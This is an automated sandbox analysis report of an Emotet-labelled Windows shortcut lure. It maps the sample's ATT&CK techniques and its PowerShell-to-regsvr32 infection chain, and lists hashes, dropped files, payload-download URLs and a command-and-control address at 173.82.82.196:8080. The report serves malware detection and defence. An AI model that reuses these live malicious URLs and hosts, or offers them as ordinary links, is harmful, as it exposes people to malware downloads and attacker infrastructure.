                    Source: Yara matchFile source: 00000004.00000002.704622582.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.476229971.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.476121301.0000000002220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts2
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		OS Credential Dumping1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		Exfiltration Over Other Network Medium12
                    Ingress Tool Transfer                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts21
                    Command and Scripting Interpreter                    		Boot or Logon Initialization Scripts111
                    Process Injection                    		2
                    Obfuscated Files or Information                    		LSASS Memory2
                    File and Directory Discovery                    		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                    Encrypted Channel                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts2
                    PowerShell                    		Logon Script (Windows)Logon Script (Windows)1
                    DLL Side-Loading                    		Security Account Manager25
                    System Information Discovery                    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                    Non-Standard Port                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)31
                    Masquerading                    		NTDS1
                    Query Registry                    		Distributed Component Object ModelInput CaptureScheduled Transfer2
                    Non-Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script31
                    Virtualization/Sandbox Evasion                    		LSA Secrets131
                    Security Software Discovery                    		SSHKeyloggingData Transfer Size Limits22
                    Application Layer Protocol                    		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common111
                    Process Injection                    		Cached Domain Credentials31
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    Hidden Files and Directories                    		DCSync12
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                    Regsvr32                    		Proc Filesystem1
                    Application Window Discovery                    		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                    Remote System Discovery                    		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 632057 Sample: RechnungsDetails 2022.20.05... Startdate: 23/05/2022 Architecture: WINDOWS Score: 100 47 Multi AV Scanner detection for domain / URL 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Antivirus detection for URL or domain 2->51 53 9 other signatures 2->53 8 cmd.exe 1 2->8         started        11 svchost.exe 9 1 2->11         started        14 svchost.exe 1 2->14         started        16 4 other processes 2->16 process3 dnsIp4 57 Windows shortcut file (LNK) starts blacklisted processes 8->57 59 Suspicious powershell command line found 8->59 18 powershell.exe 14 20 8->18         started        23 conhost.exe 1 8->23         started        41 127.0.0.1 unknown unknown 11->41 43 192.168.2.1 unknown unknown 14->43 signatures5 process6 dnsIp7 37 jsonsintl.com 98.142.105.106, 49754, 80 DIMENOCUS United States 18->37 39 www.jsonsintl.com 18->39 33 C:\Users\user\AppData\...\IKdzfJtQpj.BCP, PE32+ 18->33 dropped 55 Powershell drops PE file 18->55 25 regsvr32.exe 5 18->25         started        file8 signatures9 process10 file11 35 C:\Windows\System32\ZrCipB\RLcE.dll (copy), PE32+ 25->35 dropped 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 25->61 29 regsvr32.exe 25->29         started        signatures12 process13 dnsIp14 45 173.82.82.196, 49782, 8080 MULTA-ASN1US United States 29->45 63 System process connects to network (likely due to code injection or exploit) 29->63 signatures15

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    RechnungsDetails 2022.20.05_1044.lnk41%ReversingLabsShortcut.Trojan.BynocoLNK
                    RechnungsDetails 2022.20.05_1044.lnk100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP31%MetadefenderBrowse
                    C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP40%ReversingLabsWin64.Trojan.Emotet

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    jsonsintl.com5%VirustotalBrowse
                    www.jsonsintl.com4%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                    http://www.jsonsintl.com/0%Avira URL Cloudsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    http://digitalkitchen.jp/images/PVn/100%Avira URL Cloudmalware
                    https://go.micro0%URL Reputationsafe
                    https://173.82.82.196/hU100%Avira URL Cloudmalware
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    https://173.82.82.196/100%URL Reputationmalware
                    http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/100%Avira URL Cloudmalware
                    http://crl.ver)0%Avira URL Cloudsafe
                    https://173.82.82.196:8080/s64100%Avira URL Cloudmalware
                    https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                    http://piffl.com/piffl.com/a/ity.100%Avira URL Cloudmalware
                    http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/100%Avira URL Cloudmalware
                    http://jsonsintl.com0%Avira URL Cloudsafe
                    https://173.82.82.196:8080/100%URL Reputationmalware
                    https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                    http://piffl.com/piffl.com/a/100%Avira URL Cloudmalware
                    https://173.82.82.196:8080/tem100%Avira URL Cloudmalware
                    https://nakharinitwebhosting.com/HSDYKN1X5GLF/100%Avira URL Cloudmalware
                    http://crl.microsof0%URL Reputationsafe
                    http://www.jsonsintl.com0%Avira URL Cloudsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://www.pango.co/privacy0%URL Reputationsafe
                    https://disneyplus.com/legal.0%URL Reputationsafe
                    https://www.tiktok.com/legal/report0%URL Reputationsafe
                    http://help.disneyplus.com.0%URL Reputationsafe
                    http://www.jsonsintl.comx0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    jsonsintl.com
                    		98.142.105.106
                    		truetrueunknown
                    www.jsonsintl.com
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/true
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000012.00000003.694418224.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.694341843.0000027EE419D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.480357906.000001AFF0F43000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.jsonsintl.com/powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.461419461.000001AFE10F0000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.461419461.000001AFE10F0000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://digitalkitchen.jp/images/PVn/powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://go.micropowershell.exe, 00000002.00000002.479789071.000001AFE2077000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://173.82.82.196/hUregsvr32.exe, 00000004.00000002.704197704.00000000005A8000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 00000002.00000002.480357906.000001AFF0F43000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000002.00000002.480357906.000001AFF0F43000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://173.82.82.196/regsvr32.exe, 00000004.00000002.704320323.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527854903.00000000005E2000.00000004.00000020.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        		unknown
                        http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://crl.ver)svchost.exe, 00000008.00000002.705634102.000001F197E85000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.704616242.0000027EE36EE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        https://173.82.82.196:8080/s64regsvr32.exe, 00000004.00000002.704320323.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527854903.00000000005E2000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000012.00000003.699274936.0000027EE41B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.699365782.0000027EE419C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.699248886.0000027EE41B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.699317061.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.699433667.0000027EE4602000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://piffl.com/piffl.com/a/ity.powershell.exe, 00000002.00000002.461419461.000001AFE10F0000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://jsonsintl.compowershell.exe, 00000002.00000002.478180056.000001AFE1AED000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.461419461.000001AFE10F0000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://support.hotspotshield.com/svchost.exe, 00000012.00000003.683864450.0000027EE419D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684039321.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684077801.0000027EE4619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.683974723.0000027EE4602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684059886.0000027EE41AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684009134.0000027EE4603000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.683872663.0000027EE41AD000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://173.82.82.196:8080/regsvr32.exe, 00000004.00000002.704320323.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527854903.00000000005E2000.00000004.00000020.00020000.00000000.sdmptrue
                            • URL Reputation: malware
                            		unknown
                            https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000012.00000003.694418224.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.694341843.0000027EE419D000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://piffl.com/piffl.com/a/powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://173.82.82.196:8080/temregsvr32.exe, 00000004.00000002.704320323.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527854903.00000000005E2000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://nakharinitwebhosting.com/HSDYKN1X5GLF/powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://crl.microsofpowershell.exe, 00000002.00000002.481052167.000001AFF90D3000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.jsonsintl.compowershell.exe, 00000002.00000002.478143569.000001AFE1AD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.478180056.000001AFE1AED000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/powershell.exe, 00000002.00000002.480357906.000001AFF0F43000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.480357906.000001AFF0F43000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.hotspotshield.com/terms/svchost.exe, 00000012.00000003.683864450.0000027EE419D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684039321.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684077801.0000027EE4619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.683974723.0000027EE4602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684059886.0000027EE41AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684009134.0000027EE4603000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.683872663.0000027EE41AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://www.pango.co/privacysvchost.exe, 00000012.00000003.683864450.0000027EE419D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684039321.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684077801.0000027EE4619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.683974723.0000027EE4602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684059886.0000027EE41AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684009134.0000027EE4603000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.683872663.0000027EE41AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://disneyplus.com/legal.svchost.exe, 00000012.00000003.694418224.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.694341843.0000027EE419D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.tiktok.com/legal/reportsvchost.exe, 00000012.00000003.699317061.0000027EE418B000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.461186935.000001AFE0EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://cmentarz.5v.pl/themes/zalMkTb/powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://help.disneyplus.com.svchost.exe, 00000012.00000003.694418224.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.694341843.0000027EE419D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.jsonsintl.comxpowershell.exe, 00000002.00000002.478143569.000001AFE1AD8000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    173.82.82.196
                                    		unknownUnited States
                                    		35916MULTA-ASN1UStrue
                                    98.142.105.106
                                    		jsonsintl.comUnited States
                                    		33182DIMENOCUStrue

                                    Private

                                    IP
                                    192.168.2.1
                                    127.0.0.1

                                    General Information

                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:632057
                                    Start date and time: 23/05/202208:52:492022-05-23 08:52:49 +02:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 7m 52s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:RechnungsDetails 2022.20.05_1044.lnk
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:20
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winLNK@14/8@2/4
                                    EGA Information:
                                    • Successful, ratio: 66.7%
                                    HDC Information:
                                    • Successful, ratio: 51.3% (good quality ratio 27.5%)
                                    • Quality average: 32.8%
                                    • Quality standard deviation: 37.5%
                                    HCA Information:
                                    • Successful, ratio: 95%
                                    • Number of executed functions: 41
                                    • Number of non-executed functions: 116
                                    Cookbook Comments:
                                    • Found application associated with file extension: .lnk
                                    • Adjust boot time
                                    • Enable AMSI

                                    Warnings

                                    • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.223.24.244
                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                    • Execution Graph export aborted for target powershell.exe, PID 7100 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    08:54:09API Interceptor39x Sleep call for process: powershell.exe modified
                                    08:54:30API Interceptor9x Sleep call for process: svchost.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    173.82.82.196Rechnung 2022.20.05_1440.xlsGet hashmaliciousBrowse
                                      melimar.com.xlsGet hashmaliciousBrowse
                                        AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                          qJhkILqiEA.dllGet hashmaliciousBrowse
                                            ySv9jlPYxN.dllGet hashmaliciousBrowse
                                              uDAHAlLDYG.dllGet hashmaliciousBrowse
                                                qJhkILqiEA.dllGet hashmaliciousBrowse
                                                  kUXfb4ZQK4.dllGet hashmaliciousBrowse
                                                    ySv9jlPYxN.dllGet hashmaliciousBrowse
                                                      uDAHAlLDYG.dllGet hashmaliciousBrowse
                                                        KzqzJLGI6e.dllGet hashmaliciousBrowse
                                                          EVS7gcLnud.dllGet hashmaliciousBrowse
                                                            kUXfb4ZQK4.dllGet hashmaliciousBrowse
                                                              o2PJRbV77k.dllGet hashmaliciousBrowse
                                                                EVS7gcLnud.dllGet hashmaliciousBrowse
                                                                  KzqzJLGI6e.dllGet hashmaliciousBrowse
                                                                    o2PJRbV77k.dllGet hashmaliciousBrowse
                                                                      M7GdKu4Giv.dllGet hashmaliciousBrowse
                                                                        Hr5V6ZHTKv.dllGet hashmaliciousBrowse
                                                                          98.142.105.106Gmail.zipGet hashmaliciousBrowse
                                                                          • www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          MULTA-ASN1USRechnung 2022.20.05_1440.xlsGet hashmaliciousBrowse
                                                                          • 173.82.82.196
                                                                          melimar.com.xlsGet hashmaliciousBrowse
                                                                          • 173.82.82.196
                                                                          AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                                                          • 173.82.82.196
                                                                          qJhkILqiEA.dllGet hashmaliciousBrowse
                                                                          • 173.82.82.196
                                                                          ySv9jlPYxN.dllGet hashmaliciousBrowse
                                                                          • 173.82.82.196
                                                                          uDAHAlLDYG.dllGet hashmaliciousBrowse
                                                                          • 173.82.82.196
                                                                          qJhkILqiEA.dllGet hashmaliciousBrowse
                                                                          • 173.82.82.196
                                                                          kUXfb4ZQK4.dllGet hashmaliciousBrowse
                                                                          • 173.82.82.196
                                                                          ySv9jlPYxN.dllGet hashmaliciousBrowse
                                                                          • 173.82.82.196
                                                                          uDAHAlLDYG.dllGet hashmaliciousBrowse
                                                                          • 173.82.82.196
                                                                          KzqzJLGI6e.dllGet hashmaliciousBrowse
                                                                          • 173.82.82.196
                                                                          EVS7gcLnud.dllGet hashmaliciousBrowse
                                                                          • 173.82.82.196
                                                                          kUXfb4ZQK4.dllGet hashmaliciousBrowse
                                                                          • 173.82.82.196
                                                                          o2PJRbV77k.dllGet hashmaliciousBrowse
                                                                          • 173.82.82.196
                                                                          EVS7gcLnud.dllGet hashmaliciousBrowse
                                                                          • 173.82.82.196
                                                                          KzqzJLGI6e.dllGet hashmaliciousBrowse
                                                                          • 173.82.82.196
                                                                          o2PJRbV77k.dllGet hashmaliciousBrowse
                                                                          • 173.82.82.196
                                                                          miori.arm7-20220522-1600Get hashmaliciousBrowse
                                                                          • 216.127.183.179
                                                                          M7GdKu4Giv.dllGet hashmaliciousBrowse
                                                                          • 173.82.82.196
                                                                          DIMENOCUSGmail.zipGet hashmaliciousBrowse
                                                                          • 98.142.105.106
                                                                          miori.armGet hashmaliciousBrowse
                                                                          • 184.171.252.89
                                                                          invoice.xlsxGet hashmaliciousBrowse
                                                                          • 186.227.194.58
                                                                          myp0912.exeGet hashmaliciousBrowse
                                                                          • 198.136.49.34
                                                                          http://walbrookasset.andreidesign.com.br/ere/?e=bmVpbC5zYXdicmlkZ2VAd2FsYnJvb2thc3NldC5jb20=Get hashmaliciousBrowse
                                                                          • 67.23.238.11
                                                                          http://walbrookasset.andreidesign.com.br/ere/?e=bmVpbC5zYXdicmlkZ2VAd2FsYnJvb2thc3NldC5jb20=Get hashmaliciousBrowse
                                                                          • 67.23.238.11
                                                                          http://seccl.grupotech.com.br/ioo/?e=amFjay5jdWxsaXNAc2VjY2wudGVjaA==Get hashmaliciousBrowse
                                                                          • 187.45.179.58
                                                                          YIbpw8KksnGet hashmaliciousBrowse
                                                                          • 198.136.58.131
                                                                          swift copy.exeGet hashmaliciousBrowse
                                                                          • 64.37.52.225
                                                                          documents.exeGet hashmaliciousBrowse
                                                                          • 64.37.52.225
                                                                          Invoice.exeGet hashmaliciousBrowse
                                                                          • 64.37.52.225
                                                                          Invoice.exeGet hashmaliciousBrowse
                                                                          • 64.37.52.225
                                                                          Payment Slip.exeGet hashmaliciousBrowse
                                                                          • 64.37.52.225
                                                                          Payment Slip.exeGet hashmaliciousBrowse
                                                                          • 64.37.52.225
                                                                          0Pey7zVmABGet hashmaliciousBrowse
                                                                          • 98.142.106.247
                                                                          7995387849855083251770484.lnkGet hashmaliciousBrowse
                                                                          • 138.128.170.10
                                                                          mybe.xlsmGet hashmaliciousBrowse
                                                                          • 212.18.231.208
                                                                          mybe.xlsmGet hashmaliciousBrowse
                                                                          • 212.18.231.208
                                                                          X_3333044513.xlsbGet hashmaliciousBrowse
                                                                          • 212.18.231.208

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                          Created / dropped Files

                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                          Download File
                                                                          Process:C:\Windows\System32\svchost.exe
                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xcd192033, page size 16384, DirtyShutdown, Windows version 10.0
                                                                          Category:dropped
                                                                          Size (bytes):786432
                                                                          Entropy (8bit):0.2506588403849658
                                                                          Encrypted:false
                                                                          SSDEEP:384:M+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:TSB2nSB2RSjlK/+mLesOj1J2
                                                                          MD5:2B8BE8B3C3CED65563CC4CB9EADCC3EC
                                                                          SHA1:6DE73BCAD562E238AF9948F4F744AB373AC8A3F2
                                                                          SHA-256:05126F1424E718FB2A521C971F470D202909639AFB23A209135BDD5F34385248
                                                                          SHA-512:AF6E261FDDB577365675E4A682D6817A184C9258E5DD1BDD026D7C451A485DA8C49A0F3F3B5B2B485F9A010507A6D2AEA16D2B957053F8D50BDA845E54756813
                                                                          Malicious:false
                                                                          Preview:.. 3... ................e.f.3...w........................&..........w...6...z_.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................Zp...6...z_a.....................6...z_.........................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1192
                                                                          Entropy (8bit):5.325275554903011
                                                                          Encrypted:false
                                                                          SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                                                                          MD5:05CF074042A017A42C1877FC5DB819AB
                                                                          SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                                                                          SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                                                                          SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                                                                          Malicious:false
